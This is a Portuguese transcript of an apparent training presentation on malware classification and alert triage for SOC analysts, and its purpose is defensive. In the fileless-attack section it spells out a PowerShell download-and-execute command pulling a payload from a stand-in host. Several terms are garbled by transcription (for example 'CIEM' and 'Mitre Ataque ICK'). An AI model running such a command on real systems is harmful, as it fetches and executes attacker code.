Bem-vindos ao Guia Prático de Classificação de Malware voltado para o ambiente de Security Operations Center, o SOC. Este material foi estruturado com um objetivo muito claro: transformar conhecimento teórico em capacidade analítica real. Não basta saber o que é um ransomware, se, diante de um alerta no CIEM às 3 da manhã, você não consegue distingui-lo de um wiper, dois vetores cujo comportamento inicial pode ser superficialmente parecido, mas cuja estratégia de contenção é radicalmente diferente. Ao longo desta apresentação, vamos construir uma taxonomia funcional de ameaças, entender os formatos técnicos que a suportam, estudar famílias reais com mapeamento no Mitre Ataque ICK e aplicar tudo isso em cenários práticos de triagem de alertas corporativos. Se você atua como analista nível 1, 2 ou 3, ou está se preparando para certificações como CompTIA CISA Plus, CEE, GCIA ou GCIH, este conteúdo é diretamente aplicável ao seu dia a dia. Antes de entrar nos detalhes técnicos, é fundamental entender como este material foi organizado. Ele segue um ciclo de 4 dimensões analíticas, que juntas constroem a intuição de um analista SOC experiente. A primeira dimensão é o comportamento, o quê. Aqui identificamos categorias de ameaças pelo propósito funcional do malware. Ele quer roubar dados, criptografar arquivos, minerar criptomoeda. O comportamento define a taxonomia. A segunda é operações reais, o quem. Vamos estudar famílias específicas e seus métodos de propagação. Não é apenas teoria, é inteligência operacional baseada em incidentes documentados. A terceira dimensão é formatos técnicos, o como. Binários compilados versus scripts interpretados têm arquiteturas e superfícies de detecção completamente distintas. Um analista que ignora essa diferença vai errar o vetor de resposta. E a quarta dimensão é a análise prática, a ação. Vamos aplicar tudo em alertas simulados de um ambiente SOC real. O objetivo central, como define este framework, é construir a intuição analítica necessária para ler alertas complexos e determinar a contenção exata, sem hesitação, sem tempo perdido. Esta tabela reúne as principais categorias de malware e seus comportamentos observáveis no SOC, servindo como referência para classificar alertas. Adware exibe anúncios e pop-ups constantes, com processos em segundo plano e conexões com redes de publicidade. Geralmente tem gravidade baixa a média, mas pode servir como vetor para ameaças mais graves. Spyware coleta dados de forma oculta, rastreando atividades e, em alguns casos, gravando a tela. É uma ameaça de alta gravidade, especialmente em ambientes corporativos. Ransomware criptografa arquivos em massa e exibe notas de resgate. É uma ameaça crítica, exigindo resposta imediata para conter o impacto. Wiper tem finalidade destrutiva, apagando ou sobrescrevendo dados sem pedir resgate. Sua identificação é essencial, pois o tratamento no SOC é diferente do ransomware. C2/HAT permite controle remoto do endpoint comprometido, com conexões persistentes para servidores externos. Normalmente indica ataque em múltiplas fases. Data Stealer rouba arquivos, credenciais e cookies de sessão, com sinais de leitura intensa de diretórios e exfiltração para IPs externos. Keylogger captura tudo o que é digitado, principalmente senhas. Muitas vezes aparece combinado com stealers. Cryptominer sequestra recursos da máquina para mineração de criptomoedas, causando uso elevado de CPU, lentidão e tráfego de rede anômalo. Em resumo, a tabela funciona como um dicionário prático para reconhecer rapidamente ameaças com base no comportamento observado no ambiente SOC. Agora vamos introduzir um conceito que vai fundamentalmente mudar como você prioriza e responde a incidentes. O espectro comportamental que vai do furtivo/silencioso ao ruidoso/destrutivo. No extremo esquerdo, temos spyware, keyloggers e data stealers. Esses malwares vivem do sigilo. Seu objetivo é permanecer oculto o máximo possível, exfiltrando dados sem levantar suspeitas. O indicador SOC primário é tráfego de saída não autorizado, geralmente para IPs externos em portas incomuns ou via protocolos abusados como o HTTPS ou DNS tunneling.
No centro do espectro estão cryptominers e adware. Eles não precisam ser completamente invisíveis, mas também não querem ser banidos. O indicador é alto uso de CPU, lentidão perceptível pelo usuário e conexões anômalas contínuas a pools ou redes de publicidade. No extremo direito, os mais ruidosos, ransomware e wipers. Aqui não há preocupação com stealth. O ataque quer ser percebido ou simplesmente não se importa. Criptografia em massa, falhas de sistema, sobrescrita de dados. O impacto é imediato e devastador. Por que isso importa para o SOC? Porque a estratégia de contenção é diferente em cada ponta. Ameaças furtivas exigem monitoramento de rede e análise de exfiltração antes de agir. Isolar o host prematuramente pode destruir evidências forenses. Já ameaças ruidosas exigem isolamento imediato do endpoint, sem hesitação. Vamos agora descer para a camada de formato técnico. Entender como o malware é construído afeta diretamente como ele é detectado e como ele evade. Binários compilados, extensões .exe e .dll são código nativo, já traduzido para a linguagem de máquina. São escritos fisicamente no disco e o sistema operacional os executa diretamente. O vetor de entrega mais comum é a técnica da dupla extensão, um arquivo chamado invoice.pdf.exe que o usuário vê como PDF no Windows, se as extensões estiverem ocultas. A detecção é facilitada por assinaturas estáticas. O conteúdo binário é imutável, então MD5SAM ou SHA-256 identifica a ameaça de forma única, independentemente do nome do arquivo. Scripts interpretados, .ps1 para PowerShell, .js para JScript, .vbs para VBSScript, .bat para BAT, operam de forma radicalmente diferente. Eles não precisam estar em disco, podem ser executados diretamente na memória RAM, o que é a base dos ataques fileless, que vamos detalhar no próximo slide. O vetor típico é uma macro oculta em documentos Office, um report.docm que, ao ser aberto, dispara um processo PowerShell. A detecção de scripts é muito mais desafiadora, envolve análise de ofuscação, monitoramento de chamadas de linha de comando e detecção comportamental em tempo de execução. A conclusão prática. Se você está lidando com um binário, priorize hash e correlação com Threat Intelligence Feeds. Se está lidando com um script, monitore os processos filhos gerados e os argumentos de linha de comando, especialmente invocações de PowerShell encoded ou WScript com parâmetros ofuscados. Vamos entender o ciclo de vida completo de um binário malicioso, do momento da entrega até a detecção. Etapa 1. Entrega. O binário chega à máquina da vítima, geralmente como anexo de e-mail de phishing ou download drive-by. O exemplo clássico, invoice.pdf.exe. O usuário clica pensando ser um PDF, e o binário é baixado. Etapa 2. Gravação. O arquivo compilado é escrito fisicamente no disco rígido do host. Isso é uma característica fundamental dos binários. Eles deixam rastro no sistema de arquivos. Isso é relevante tanto para a detecção quanto para a forense pós-incidente. Etapa 3. Execução. O sistema operacional lê o arquivo e carrega a carga binária para execução na CPU. Aqui o malware começa a sua operação, seja estabelecer persistência, fazer beacon para C2 ou iniciar criptografia. Etapa 4. Detecção estática. A estrutura estática imutável do binário permite que ferramentas como antivírus tradicionais e firewalls com capacidade de inspeção de arquivos gerem um hash, tipicamente MD5 ou SHA-256, e o bloqueiem se ele constar em bases de Threat Intelligence. Um checksum identifica a ameaça de forma única, independentemente de como o arquivo foi renomeado. A implicação operacional. Para binários conhecidos, a detecção é relativamente direta. O problema começa quando os atacantes recompilam o binário com pequenas modificações, gerando um novo hash não indexado. É o que se chama de polymorphism. Esse slide representa um dos conceitos mais importantes e mais desafiadores para analistas SOC modernos, o ataque fileless, ou execução sem arquivo. Vamos seguir o fluxo de ataque passo a passo, usando um exemplo real baseado no comportamento do Luma Stealer. Etapa 1. Ponto de entrada. A macro maliciosa está embutida em um documento aparentemente legítimo, report.docm.
Quando o usuário abre o arquivo e habilita macros, o VBA Code aciona um processo legítimo do sistema, tipicamente o winword.exe ou diretamente o PowerShell.exe. Nenhum novo executável foi gravado no disco ainda. Etapa 2. Chamada PowerShell. O script lança o PowerShell silenciosamente, com parâmetros projetados para evasão. PowerShell, -nop, -hidden, -c, iex, new object, net.webclient, download string, http, malicious.site, payload.ps1. O flag -nop desabilita o perfil de execução. O flag -hidden oculta a janela. O iex executa o script baixado diretamente na memória. Nenhum arquivo .ps1 é salvo no disco. Etapa 3. Descriptografia base 64. Uma variável massiva de dados ofuscados é descriptografada diretamente na memória RAM, usando codificação base 64 e às vezes SHOR. O código é virtualmente ilegível para análise estática. Etapa 4. Execução na memória. A carga final, neste caso o Luma Stealer, é injetada via .NET Assembly diretamente na memória de um processo legítimo, como explorer.exe ou svhost.exe. Em nenhum momento um arquivo malicioso toca o disco. A conclusão crítica para o SOC. Ataques fileless não deixam rastros estáticos. O hash tradicional é inútil aqui. A detecção exige monitoramento de processos anômalos. Um winword.exe gerando um filho PowerShell.exe é imediatamente suspeito. Análise de logs de linha de comando via EDR, como CrowdStrike, SentinelOne ou Microsoft Defender for Endpoint, e detecção de injeção de processo via syscall monitoring. Agora vamos elevar o nível. Vamos mapear as categorias de malware ao framework MITRE ATT&CK, o padrão global para a descrição de táticas, técnicas e procedimentos de adversários. O MITRE ATT&CK organiza o comportamento de ameaças em táticas, os objetivos de alto nível que o adversário quer atingir, e técnicas, os métodos específicos usados para atingi-los. Para fins operacionais, agrupamos as famílias em 4 grandes categorias funcionais: roubo e exfiltração, mapeado para TA0009, Collection, e TA0010, Exfiltration. Aqui entram stealers e spyware, que coletam e vazam dados. Roubo de credenciais, mapeado para TA0006, Credential Access. Keyloggers e Credential Harvesters vivem aqui. Destruição e bloqueio, mapeado para TA0040, Impact. Ransomwares e wipers têm esse objetivo como tática final. Controle remoto, mapeado para TA0011, Command and Control, e TA0002, Execution. Rats e backdoors residem aqui. Por que isso importa? Porque mapear um comportamento observado no CIEM para uma tática ataque transforma o dado bruto em inteligência acionável. Quando você vê um alerta de conexão externa periódica, já sabe, possível TA0011, e isso direciona sua investigação. Vamos estudar 2 exemplos operacionais reais de famílias de stealers, analisando como cada uma funciona e como diferenciá-las no SOC. Agent Tesla é um data stealer clássico, ativo desde 2014 e ainda altamente prevalente. Sua tática MITRE é TA0010, Exfiltration. O vetor de entrega é phishing via e-mail corporativo, geralmente com anexos .docm ou .xlsm contendo macros. Após a infecção, o Agent Tesla realiza 3 operações principais: captura de tela em intervalos regulares, varredura de navegadores para roubar credenciais salvas e cookies, e exfiltração ativa de arquivos sensíveis para servidores externos controlados pelo atacante, frequentemente via SMTP, FTP ou HTTP. No SOC, o indicador principal é tráfego de saída contínuo para IPs externos não catalogados, especialmente nas portas 25, 587 ou 465, portas de e-mail, o que é incomum para uma estação de trabalho. Redline Stealer é uma ameaça híbrida, combina keylogger e stealer, e mapeia para 2 táticas, TA0006, Credential Access, e TA0010, Exfiltration. O vetor de entrega inclui sites maliciosos e downloads falsos, frequentemente disfarçados de software pirata ou cheats de jogos.
O Redline captura digitação em tempo real, rouba cookies de sessão de navegadores, extrai dados de carteiras de criptomoeda como MetaMask e Exodus e orquestra fraudes massivas, especialmente account takeover e fraude financeira. A distinção prática. Agent Tesla exfiltra arquivos. Redline foca em credenciais e sessões ativas. Nos dois casos, o playbook de contenção envolve isolamento imediato do host, revogação de credenciais e análise forense de navegadores. Este slide apresenta dois adversários que operam no extremo destrutivo do espectro, mas com motivações diametralmente opostas, o que muda radicalmente a análise forense e a atribuição. A Kira é um grupo de Ransomware as a Service, ativo desde 2023, responsável por centenas de ataques a organizações globais. Suas táticas MITRE são TA-0040 Impact e TA-0011 Command and Control. A operação padrão do Akira envolve acesso inicial via VPN sem MFA ou credenciais comprometidas, movimento lateral, estabelecimento de persistência, exfiltração de dados sensíveis e, por último, criptografia dos arquivos vitais do ambiente. A extorsão é dupla: pagamento para receber a chave de descriptografia e ameaça de publicar os dados roubados no seu site Tor caso a vítima não pague. Shamoon, por outro lado, é um wiper, e isso define tudo. Sua única tática é TA-0040, e não há TA-0011 porque não existe intenção de controle ou negociação. O Shamoon ficou mundialmente conhecido pelo ataque a Saudi Aramco em agosto de 2012, onde destruiu mais de 35 mil estações de trabalho, sobrescrevendo o MBR e os dados do disco com imagens de uma bandeira americana em chamas. O diferencial crítico para o SOC. Ambos causam danos operacionais equivalentes, mas o Shamoon não quer dinheiro, quer destruição permanente. Não há chave de descriptografia, não há negociação. O objetivo é geopolítico ou sabotagem industrial. Isso muda a análise de atribuição e o acionamento das equipes de crise. Neste slide, contrastamos dois adversários que representam extremos diferentes em termos de sofisticação e vetor. O Qakbot, um RAT modular de alto volume, e o Pegasus, um spyware estatal de elite. Qakbot, também chamado de Kibot, começou sua vida como um trojan bancário em 2007 e evoluiu para uma plataforma modular de acesso remoto. Suas táticas são TA-0011, Command and Control, e TA-0002, Execution. A operação do Qakbot é altamente sofisticada. Ele estabelece uma ponte remota persistente que serve como loader inicial para outros malwares, especialmente ransomwares como Black Basta e Conti. O modelo de negócio é o Access as a Service. Grupos de ransomware pagam ao Qakbot para ter acesso inicial já estabelecido em redes corporativas. No SOC, o indicador é beacon periódico para a infraestrutura C2 em portas incomuns e movimento lateral via SMB ou RDP. Pegasus, desenvolvido pela empresa israelense NSO Group, é um spyware móvel de nível estatal, o mais sofisticado jamais documentado publicamente. Suas táticas são TA-0009, Collection, e TA-0010, Exfiltration. O que torna o Pegasus excepcional é a capacidade de exploração zero-clique. A vítima não precisa clicar em nada. Uma simples mensagem enviada via iMessage ou WhatsApp pode comprometer o dispositivo silenciosamente. Uma vez instalado, o Pegasus intercepta mensagens criptografadas, rastreia a localização GPS em tempo real e ativa microfone e câmera de forma invisível. A distinção operacional: Qakbot é commodity malware de alto volume, detectável com ferramentas corporativas padrão. Pegasus é espionagem direcionada, exigindo análise forense especializada de dispositivos móveis. Agora chegamos ao coração da prática, o fluxo estruturado de triagem que um analista SOC deve executar ao receber um alerta. Esse processo é o que separa uma resposta eficiente de uma contenção tardia. Etapa 1. Identificação inicial. A primeira pergunta é: qual processo disparou o alerta no painel SOC? Antes de qualquer ação, você precisa identificar o processo pai, o processo filho, o usuário associado e o hostname. O CIEM deve fornecer esse contexto imediato. Etapa 2. Análise de telemetria.
Com o processo identificado, você investiga os indicadores observáveis. Qual é o uso de CPU? Há conexões para IPs externos? O processo está fazendo chamadas de sistemas suspeitas, como leitura de clipboard, acesso a diretórios de senhas ou criação de threads remotos? Essa é a fase de coleta de evidências técnicas via EDR, logs de firewall e NetFlow. Etapa 3. Classificação comportamental. Com os dados de telemetria em mão, você mapeia os indicadores para a taxonomia teórica que estudamos. Alto CPU com conexões a pools de mineração, CryptoMiner. Acesso a clipboard mais upload para IP externo, Stealer Keylogger. Renomeação massiva de arquivos, ransomware ativo. Essa classificação define o nível de urgência e o playbook correto. Etapa 4. Estratégia de contenção. Com a classificação feita, você executa o playbook específico para aquela ameaça. Cada tipo de malware tem uma resposta diferente. Isolar o host imediatamente, bloquear o IP no firewall, revogar credenciais, acionar o time de forense. O playbook existe exatamente para que essa decisão seja tomada em segundos, não em minutos. Vamos agora aplicar o framework em um cenário real de painel SOC. 2 alertas foram gerados no mesmo dia, 21 de março de 2025. Vamos analisá-los. Alerta 1. 11:58, ads.service.exe. Severidade, médio. A descrição informa: processo suspeito com múltiplas requisições de saída para domínios de publicidade e elevada atividade de janelas pop-up. Análise imediata. O nome do processo já é suspeito. ads.service.exe não é um serviço legítimo do Windows. O comportamento, pop-ups e requisições para redes de publicidade, aponta claramente para adware. O comportamento é classificado como ruidoso, afeta a experiência do usuário, mas sem indicação de exfiltração de dados. Ação: investigar, identificar o software que instalou o processo e removê-lo. Alerta 2. 12:40, system.update.exe. Severidade, crítico. A descrição informa: processo acessando área de transferência, clipboard, lendo arquivos locais e fazendo o upload para o IP externo, 144.12.39.111. Análise imediata. 3 red flags simultâneos. Primeiro, system.update.exe é um nome genérico frequentemente usado por malwares para se disfarçar de processo legítimo. Segundo, acesso a clipboard indica coleta de credenciais ou dados sensíveis, mapeamento direto para TA0006. Terceiro, upload para IP externo confirma exfiltração ativa, TA0010. Classificação: spyware, stealer. Severidade crítica justificada. Ação: remediação imediata. Perceba como a telemetria, mesmo em formato resumido de alerta, é suficiente para classificar corretamente se você conhece a taxonomia. Aprofundemos agora a análise de cada caso e as ações de contenção específicas. Caso 1. ads.service.exe. Adware. O racional completo é: o comportamento está focado exclusivamente na geração forçada de anúncios. As requisições vão para domínios de publicidade conhecidos, não para infraestrutura de C2. Não há evidência de leitura de arquivos sensíveis, acesso a credenciais ou exfiltração de dados. O vetor de entrega provavelmente foi um software bundled, instalado junto com algum freeware. A estratégia de contenção é proporcional: encerrar o processo suspeito, identificar e desinstalar o software que o instalou, verificar outras máquinas na mesma subnet para propagação lateral e atualizar as regras do proxy para bloquear os domínios de publicidade identificados. Nota importante: mesmo sendo adware, de baixa gravidade, o processo deve ser investigado completamente. Adware é frequentemente usado como vetor de instalação para payloads secundários mais severos. Caso 2. systemupdate.exe. Stealer Keylogger, híbrido. O racional técnico completo. O acesso ao clipboard via API OpenClipboard é característica primária de Credential Stealers e Keyloggers, TA0006, Credential Access. A comunicação com o IP externo 144.12.39.111, em conjunto com a leitura de arquivos locais, confirma a exfiltração ativa de dados, TA0010. A combinação das duas táticas classifica isso como uma ameaça híbrida,
possivelmente semelhante ao Red Line Stealer. A estratégia de contenção é imediata e multifrente. Isolar o host da rede imediatamente, sem negociação. Bloquear o IP 144.12.39.111 no firewall de borda. Forçar redefinição de todas as senhas do usuário afetado em todos os sistemas. Coletar imagem forense da memória RAM antes de desligar a máquina. Verificar logs do servidor de autenticação para identificar acessos com as credenciais potencialmente comprometidas. Notificar o usuário e o gestor de risco. Este caso exemplifica exatamente por que a classificação correta é crítica. Uma resposta equivocada que tratasse isso como um simples adware deixaria uma exfiltração de dados ativa por horas ou dias. Chegamos ao fechamento. Este slide resume a jornada que percorremos e o que ela representa para sua prática como analista. O ciclo completo do analista SOC maduro passa por 4 estágios que se retroalimentam continuamente: teoria e fundamentos, a taxonomia de ameaças e a arquitetura de formatos que estudamos hoje. Sem isso, você não tem vocabulário para nomear o que vê. Análise prática, a capacidade de triagem de telemetria e leitura de alertas. Sem isso, o conhecimento teórico fica inerte. Intuição analítica, a capacidade de antecipar ações do adversário e determinar impacto antes de ter todas as evidências. Isso é o que diferencia um analista nível 1 de um analista sênior. Inteligência de operações, o reconhecimento de famílias de malware do mundo real com seus TTPs mapeados no Mitre ataque. Isso fecha o ciclo, realimentando a teoria com dados operacionais frescos. A mensagem final do guia é precisa. O domínio da classificação transcende a memorização de definições. Ao transformar o conhecimento arquitetônico em triagem ativa, o analista SOC não apenas reage ao ataque, ele neutraliza a ameaça. Continue praticando com cenários simulados, mantenha seus feeds de Threat Intelligence atualizados e lembre-se, cada alerta é uma oportunidade de refinar sua intuição analítica.